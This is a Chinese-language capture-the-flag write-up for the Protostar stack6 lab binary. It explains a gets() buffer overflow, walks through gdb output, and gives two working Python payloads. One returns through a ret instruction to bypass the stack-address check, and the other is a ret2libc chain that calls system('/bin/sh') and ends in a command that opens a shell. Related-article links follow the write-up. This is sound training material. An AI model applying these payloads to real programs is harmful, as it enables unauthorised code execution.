源码如下:

  1. #include <stdlib.h>
  2. #include <unistd.h>
  3. #include <stdio.h>
  4. #include <string.h>
  5. void getpath()
  6. {
  7. char buffer[64];
  8. unsigned int ret;
  9. printf("input path please: "); fflush(stdout);
  10. gets(buffer);
  11. ret = __builtin_return_address(0);
  12. if((ret & 0xbf000000) == 0xbf000000) {
  13. printf("bzzzt (%p)\n", ret);
  14. _exit(1);
  15. }
  16. printf("got path %s\n", buffer);
  17. }
  18. int main(int argc, char **argv)
  19. {
  20. getpath();
  21. }

首先,我们先来分析这段程序在做什么?

  1. 第1-4行导入一些常见的库函数
  2. 第6行定义了getpath()函数
  3. 第8行定义了一个buffer数组,数组长度是64
  4. 第9行定义了一个unsigned int 变量,变量名ret
  5. 第11行打印输出字符串“input path please”
  6. 第13行用gets函数向buffer数组写入字符
  7. 第15行用编译器的内建函数__builtin_return_address(0)返回当前函数的返回地址,需要进一步说明的是__builtin_return_address(1)是返回调用getpath函数的函数的返回地址(Caller's ret)。
  8. 第17行-20行就是判断该返回地址的高位是否是0xbf,如果是,退出函数。
  9. 第22行打印buffer的值

不难知道,main函数是Caller,所以第15行的返回值一定就是main函数中的下一条指令的地址,我们来查看一下当程序运行时,系统为该程序分配的栈地址是多少。

先在main函数里打个断点(程序运行后,才会由内存映射),然后使用info proc map查看

  1. Mapped address spaces:
  2. Start Addr End Addr Size Offset objfile
  3. 0x8048000 0x8049000 0x1000 0 /opt/protostar/bin/stack6
  4. 0x8049000 0x804a000 0x1000 0 /opt/protostar/bin/stack6
  5. 0xb7e96000 0xb7e97000 0x1000 0
  6. 0xb7e97000 0xb7fd5000 0x13e000 0 /lib/libc-2.11.2.so
  7. 0xb7fd5000 0xb7fd6000 0x1000 0x13e000 /lib/libc-2.11.2.so
  8. 0xb7fd6000 0xb7fd8000 0x2000 0x13e000 /lib/libc-2.11.2.so
  9. 0xb7fd8000 0xb7fd9000 0x1000 0x140000 /lib/libc-2.11.2.so
  10. 0xb7fd9000 0xb7fdc000 0x3000 0
  11. 0xb7fe0000 0xb7fe2000 0x2000 0
  12. 0xb7fe2000 0xb7fe3000 0x1000 0 [vdso]
  13. 0xb7fe3000 0xb7ffe000 0x1b000 0 /lib/ld-2.11.2.so
  14. 0xb7ffe000 0xb7fff000 0x1000 0x1a000 /lib/ld-2.11.2.so
  15. 0xb7fff000 0xb8000000 0x1000 0x1b000 /lib/ld-2.11.2.so
  16. 0xbffeb000 0xc0000000 0x15000 0 [stack]

第17行可以看到,栈空间的首地址是0xbffeb000。所以源代码中的if判断针对性非常强,也就是说没法将getpath的返回地址直接返回到buffer的首地址(因为buffer在栈上),实现ret2shellcode。

但是真的不能利用了吗?显然还有机会!但是机会是有前提的。这道题存在两个假设:

  1. 假设栈上可以执行代码(ret2shellcode)

  2. 假设栈上不能执行代码(ret2libc)

接下来,我们将根据两个假设做进一步分析。

getpath的汇编代码:

  1. (gdb) disass getpath
  2. Dump of assembler code for function getpath:
  3. 0x08048484 <getpath+0>: push ebp
  4. 0x08048485 <getpath+1>: mov ebp,esp
  5. 0x08048487 <getpath+3>: sub esp,0x68
  6. 0x0804848a <getpath+6>: mov eax,0x80485d0
  7. 0x0804848f <getpath+11>: mov DWORD PTR [esp],eax
  8. 0x08048492 <getpath+14>: call 0x80483c0 <printf@plt>
  9. 0x08048497 <getpath+19>: mov eax,ds:0x8049720
  10. 0x0804849c <getpath+24>: mov DWORD PTR [esp],eax
  11. 0x0804849f <getpath+27>: call 0x80483b0 <fflush@plt>
  12. 0x080484a4 <getpath+32>: lea eax,[ebp-0x4c]
  13. 0x080484a7 <getpath+35>: mov DWORD PTR [esp],eax
  14. 0x080484aa <getpath+38>: call 0x8048380 <gets@plt>
  15. 0x080484af <getpath+43>: mov eax,DWORD PTR [ebp+0x4]
  16. 0x080484b2 <getpath+46>: mov DWORD PTR [ebp-0xc],eax
  17. 0x080484b5 <getpath+49>: mov eax,DWORD PTR [ebp-0xc]
  18. 0x080484b8 <getpath+52>: and eax,0xbf000000
  19. 0x080484bd <getpath+57>: cmp eax,0xbf000000
  20. 0x080484c2 <getpath+62>: jne 0x80484e4 <getpath+96>
  21. 0x080484c4 <getpath+64>: mov eax,0x80485e4
  22. 0x080484c9 <getpath+69>: mov edx,DWORD PTR [ebp-0xc]
  23. 0x080484cc <getpath+72>: mov DWORD PTR [esp+0x4],edx
  24. 0x080484d0 <getpath+76>: mov DWORD PTR [esp],eax
  25. 0x080484d3 <getpath+79>: call 0x80483c0 <printf@plt>
  26. 0x080484d8 <getpath+84>: mov DWORD PTR [esp],0x1
  27. 0x080484df <getpath+91>: call 0x80483a0 <_exit@plt>
  28. 0x080484e4 <getpath+96>: mov eax,0x80485f0
  29. 0x080484e9 <getpath+101>: lea edx,[ebp-0x4c]
  30. 0x080484ec <getpath+104>: mov DWORD PTR [esp+0x4],edx
  31. 0x080484f0 <getpath+108>: mov DWORD PTR [esp],eax
  32. 0x080484f3 <getpath+111>: call 0x80483c0 <printf@plt>
  33. 0x080484f8 <getpath+116>: leave
  34. 0x080484f9 <getpath+117>: ret
  35. End of assembler dump.

看汇编代码重点关注的是它的栈结构,尤其是buffer距离ret的距离。我们尝试画出getpath的栈图(大致就可以,不需要画的多细,找距离也是通过构造特殊输入计算的,而不是根据栈图计算的。)

假设一:栈上可以执行代码

正常的ret2shellcode思路:如果栈上可以执行代码,那么我们需要修改ret的返回地址,要控制ret的返回地址到shellcode的首地址,执行shellcode。但现在ret的返回地址会被检查,所以需要在正常思路稍作改动即可。

第一个ret会被检查,那么我们控制第一个ret返回的是getpath的ret指令地址,地址为是0x080484f9。此时成功绕过内建函数检查。接着控制第二个ret指向shellcode的首地址,当运行到第2个ret时,eip加载shellcode的首地址,然后就会跳转到buffer里执行shellcode代码!

要找到ret位置,首先我们构造特殊的字符串

  1. AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

然后运行程序

  1. Starting program: /opt/protostar/bin/stack6 < /home/user/exp1.txt
  2. input path please: got path AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPUUUURRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
  3. Program received signal SIGSEGV, Segmentation fault.
  4. 0x55555555 in ?? ()

在0x55555555中出现段错误,出现段错误的原因是ret跳转指令时发现这个地址无效。所以该地址就是ret的地址。

0x55在我们构造的字符串里是’U‘,所以只要把'U'的地址替换为ret的地址即可。具体修改如下:

  1. (gdb) x /10xw $esp
  2. 0xbffff78c: 0x080484f9 0xbffff794 0xcccccccc 0xbffff800
  3. 0xbffff79c: 0xb7eadc76 0x00000001 0xbffff844 0xbffff84c
  4. 0xbffff7ac: 0xb7fe1848 0xbffff800

payload如下:

  1. # 没有真的写shellcode,而是用0xc来模拟
  2. import struct
  3. buffer = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT"
  4. ret = struct.pack("II",0x080484f9,0xbffff794)
  5. shellcode = struct.pack("I",0xcccccccc)
  6. payload = buffer + ret + shellcode
  7. print payload

假设二:栈上不可以执行代码

当栈上无法执行代码时,shellcode写入栈就没有了任何意义。那么如何利用呢?考虑的方法是借助libc库里的可执行函数,比如system()函数。system执行shell需要参数,比如“/bin/sh”字符串,我们同样也需要在libc库空间里找这个字符串。

当程序运行到ret时,ret里记录的是system函数的入口地址,程序就会jmp到system函数,system函数执行需要参数,程序就会读取"/bin/sh"字符串作为参数传递给system函数,这样就构成了system("/bin/sh")命令执行,轻松拿到shell。

如果对整个压栈的过程不是很清楚的同学们可能会疑惑,为什么syetem函数的入口地址和参数之间要隔一个system的返回地址呢?这里我简单做一个解释。

正常调用一个函数他有一个规约,对于一个main函数调用gets(buffer)函数来说,在main函数里会先把buffer参数压栈(如果是多个参数的的话,从右往左压栈),然后call gets函数。call 命令一般会干两件事,第一件事是push eip,也就是把gets函数的下一条指令地址压栈(这就是为什么栈上要放一个ret的返回的地址)。第二件事是jmp gets,跳转到gets的函数入口。

首先在libc里找到system函数的入口地址(为什么可以呢,因为libc库已经被链接到程序里了,所以可以直接搜system函数的地址)

  1. (gdb) p system
  2. $3 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>

在libc库空间搜索/bin/sh字符串

  1. user@protostar:~$ strings -t d /lib/libc-2.11.2.so | grep "/bin/sh"
  2. 1176511 /bin/sh

1176511是一个相对地址(10进制),所以还要加上libc的基址0xb7e97000(查看内存映射可得出)

Payload如下:

  1. import struct
  2. buffer = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT"
  3. system = struct.pack("I",0xb7ecffb0)
  4. ret = "AAAA"
  5. shellcode = struct.pack("I",0xb7e97000+1176511)
  6. payload = buffer +system+ ret + shellcode
  7. print payload

踩坑:

如果直接在gdb里尝试这个Payload会出现一个错误:

  1. __libc_system (line=0xb7fb63bf "/bin/sh") at ../sysdeps/posix/system.c:179
  2. 179 ../sysdeps/posix/system.c: No such file or directory.
  3. in ../sysdeps/posix/system.c

使用下面这条指令,getshell!

  1. (python exp1.py; cat) | /opt/protostar/bin/stack6

Pwn系列之Protostar靶场 Stack6题解的更多相关文章

  1. Myhchael原创题系列 Mychael vs Kid 【题解】

    题目链接 Mychael vs Kid 题解 先说说这题的由来及前身 前身 首先有一个很经典的题目: 维护区间加,查询区间\(gcd\) 如果强行用线段树维护的话,区间加之后就没法直接确定当前区间的\ ...

  2. Hdoj 4508.湫湫系列故事——减肥记I 题解

    Problem Description 对于吃货来说,过年最幸福的事就是吃了,没有之一! 但是对于女生来说,卡路里(热量)是天敌啊! 资深美女湫湫深谙"胖来如山倒,胖去如抽丝"的道 ...

  3. PWN环境搭建

    目录 PWN环境搭建 需要的工具或系统 安装PWN工具 pwntools (CTF库.漏洞利用库) pwngdb(GDB插件) checksec(查保护) ROPGadget(二进制文件查找工具) o ...

  4. PWN二进制漏洞学习指南

    目录 PWN二进制漏洞学习指南 前言 前置技能 PWN概念 概述 发音 术语 PWN环境搭建 PWN知识学习途径 常见漏洞 安全机制 PWN技巧 PWN相关资源博客 Pwn菜鸡小分队 PWN二进制漏洞 ...

  5. 【pwn】学pwn日记——栈学习(持续更新)

    [pwn]学pwn日记--栈学习(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用. 学习视频链接:XMCVE 2020 CTF Pw ...

  6. 关于『进击的Markdown』:第二弹

    关于『进击的Markdown』:第二弹 建议缩放90%食用 众里寻他千百度,蓦然回首,Markdown却在灯火灿烂处 MarkdownYYDS! 各位早上好!  我果然鸽稿了  Markdown 语法 ...

  7. IEEE Bigger系列题解

    Bigger系列题解 Bigger Python 坑点在于要高精度以及表达式求值,用java写可以很容易避免高精度问题 然后这道题就可以AC了 代码 import java.io.*; import ...

  8. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  9. QTREE系列题解

    打了快一星期的qtree终于打完了- - (其实还有两题改不出来弃疗了QAQ) orz神AK一星期前就虐完QTREE 避免忘记还是简单写下题解吧0 0 QTREE1 题意: 给出一颗带边权树 一个操作 ...

  10. DZY Loves Math 系列详细题解

    BZOJ 3309: DZY Loves Math I 题意 \(f(n)\) 为 \(n\) 幂指数的最大值. \[ \sum_{i = 1}^{a} \sum_{j = 1}^{b} f(\gcd ...

随机推荐

  1. 使用 netstat 命令监视网络状态

    在linux 系统网络出现问题时可以使用netstat -s 来分析问题 使用 netstat 命令监视网络状态 netstat 命令生成包含网络状态和协议统计信息的显示内容.可以通过表格形式显示 T ...

  2. Linux基础——操作系统

    1. 操作系统(Operation System,OS) 操作系统作为接口的示意图 如果想在裸机上运行自己所编写的程序,就必须用机器语言书写程序如果计算机上安装了操作系统,就可以在操作系统上安装支持的 ...

  3. linux sed 编辑

    只打印不修改内容 sed -n 's/sa/sa123/g' 1.txt  不加n是默认全部输出的意思 sed -n '1p' 1.txt  打印莫一行 sed a i c 表示追加 插入和替换 se ...

  4. 制作可以显示GIF动图的activeX 控件

    因为工作需要,我需要一个可以显示gif 动图的控件,用来在VBS中显示动图,结果找了半天发现根本没有这样的控件,所以只能搜集资料自己来制作一个. 下面记录一下步骤: 1. 下载 PictureEx.h ...

  5. Activiti7开发(三)-流程实例

    目录 0.前言 1.创建流程实例 2.撤销申请(未实现) 3.查看审批历史(流程实例) 4.查看审批高亮图 0.前言 流程实例是与业务相关联的,先介绍一下业务:用户申请物品,领导进行审批(同意/拒绝) ...

  6. 68.C++中的const

      编写程序过程中,我们有时不希望改变某个变量的值.此时就可以使用关键字 const 对变量的类型加以限定. 初始化和const   因为const对象一旦创建后其值就不能再改变,所以const对象必 ...

  7. 003-Cruehead-CrackMeV3

    第二个需要写注册机 首先查看文件,打开文件,什么也没有,help ->about,弹出下面的弹窗 看来是没有什么线索,直接放进OD里面 这里有一个函数CreatFileA,这个函数目的是访问一个 ...

  8. .NET周报 【3月第4期 2023-03-24】

    国内文章 .NET应用系统的国际化-多语言翻译服务 https://www.cnblogs.com/tianqing/p/17232559.html 本文重点介绍了多语言翻译服务的设计和实现.文章描述 ...

  9. Hyperf框架环境搭建

    https://hyperf.wiki/2.2/#/README 1.PHP 7.2 以上查看PHP : php -vcurl 127.0.0.1:9501 查看是否装swoole: php --ri ...

  10. JSTL标签fmt:formatDate格式化日期出错

    现象&背景: 异常: "org.apache.jasper.JasperException: 在 [115] 行处理 [/WEB-INF/jsp/modules/receivedya ...